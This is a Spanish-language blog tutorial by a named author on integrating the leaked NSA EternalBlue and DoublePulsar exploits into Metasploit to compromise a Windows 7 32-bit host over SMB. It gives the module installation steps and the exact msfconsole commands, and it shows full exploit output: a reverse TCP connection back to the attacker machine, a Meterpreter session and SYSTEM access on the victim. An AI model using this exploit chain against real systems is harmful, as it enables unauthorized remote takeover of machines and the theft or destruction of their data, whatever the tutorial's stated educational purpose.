Hackeando Windows 7 de 32 bits con EternalBlue y DoublePulsar todo desde Metasploit

Esta es una guía de como integrar EternalBlue + DoublePulsar exploits de la NSA a Metasploit. Hace algunos días se publicaba la noticia que el grupo ShadowBrokers había liberado una segunda publicación de exploits de la NSA, disponibles en el GitHub.

A pesar que el framework FuzzBunch contenía una suite de exploits, lo que más llamo la atención a la comunidad de seguridad fueron los exploits llamados EternalBlue y DoublePulsar que sirven para atacar todas las versiones de windows al protocolo SMB y RDP.

Eternalblue se encarga de crear un backdoor y Doublepulsar de inyectar una dll en el proceso del sistema que nosotros queramos, ya que en una de las opciones nos pregunta en que proceso del sistema queremos inyectar la dll.

El framework FuzzBunch es parecido a metasploit, pero corre bajo windows, y como todos saben el 99% de los auditores de seguridad, pentester, researchers del mundillo de la seguridad usamos gnu/linux.

Gracias a dos investigadores Sheila Berta (Argentina) y  Pablo Gonzalez (Español) ambos trabajadores de ElevenPaths podemos disfrutar de integrar EternalBlue y DoublePulsar a nuestro querido Metasploit.

Shiela Berta
http://www.twitter.com/UnaPibaGeek
http://www.semecayounexploit.com

Pablo Gonzalez
http://www.twitter.com/pablogonzalezpe

Esta guía se entrega con fines educativos para quienes estudian temas de ciberseguridad, no utilices este conocimiento con fines ilegales. No me hago responsable de lo que tu puedas hacer con este conocimiento.

Paso 1 – Elementos necesarios

  • Kali linux 32bits > IP 192.168.1.117 > ATACANTE
  • Windows 7 32bits > IP 192.168.1.101 > VICTIMA

1. Lo primero que vamos hacer será abrir nuestro kali linux.

2. Descargar del GitHub el archivo zip y luego descomprimirlo.

3. Copiar el archivo eternalblue_doublepulsar.rb a la siguiente dirección:
/usr/share/metasploit-framework/modules/exploits/windows/smb/

4. Crear la estructura de carpetas y copiar el contenido de la carpeta deps a /root/shadowbroker/windows/lib/x86-Windows/

5. Abrir una terminal y tipear el comando winecfg para que se cree la carpeta /root/.wine/drive_c/

6. Abrir una terminal y iniciar metasploit con el comando msfconsole

Paso 2 – Para llamar al exploit tipear use exploit/windows/smb/eternalblue_doublepulsar

msf > use exploit/windows/smb/eternalblue_doublepulsar

Si quieres ver las opciones tipear show options

msf exploit(eternalblue_doublepulsar) > show options

Paso 3 – Setear el remote host o equipo victima, tipear set RHOST ip-victima

msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.101
rhost => 192.168.1.101

Paso 4 – Para ver los targets disponibles tipear show targets

msf exploit(eternalblue_doublepulsar) > show targets

Exploit targets:

Id Name
-- ----
0 Automatic
1 Windows XP (all services pack) (x86) (x64)
2 Windows Server 2003 SP0 (x86)
3 Windows Server 2003 SP1/SP2 (x86)
4 Windows Server 2003 (x64)
5 Windows Vista (x86)
6 Windows Vista (x64)
7 Windows Server 2008 (x86)
8 Windows Server 2008 R2 (x86) (x64)
9 Windows 7 (all services pack) (x86) (x64) 

Paso 5 – Setear el SO del target con set target (nro id)

msf exploit(eternalblue_doublepulsar) > set target 9

Paso 6 – Para explotar el fallo de seguridad tipear exploit, si todo salio bien recibirá una sesión de meterpreter, si tipeamos sysinfo veremos la información del equipo vulnerado.

 
msf exploit(eternalblue_doublepulsar) > exploit

[*] Started reverse TCP handler on 192.168.1.117:4444
[*] 192.168.1.101:445 - Generating Eternalblue XML data
[*] 192.168.1.101:445 - Generating Doublepulsar XML data
[*] 192.168.1.101:445 - Generating payload DLL for Doublepulsar
[*] 192.168.1.101:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.1.101:445 - Launching Eternalblue...
[+] 192.168.1.101:445 - Pwned! Eternalblue success!
[*] 192.168.1.101:445 - Launching Doublepulsar...
[*] Sending stage (1189423 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.117:4444 -> 192.168.1.101:49158) at 2017-04-26 00:36:16 -0400
[+] 192.168.1.101:445 - Remote code executed... 3... 2... 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer : WIN7X32
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x32
System Language : es_AR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x32/windows
meterpreter >

Les dejo un pequeño video de nada menos que Chema Alonso “ElMaligno” CEO de ElevenPaths.

 

Cualquier duda puedes enviarme un email.

Autor:
Eduardo Natali
email: contacto@rootsolutions.com.ar
Twitter: https://twitter.com/enatali_
web: https://www.rootsolutions.com.ar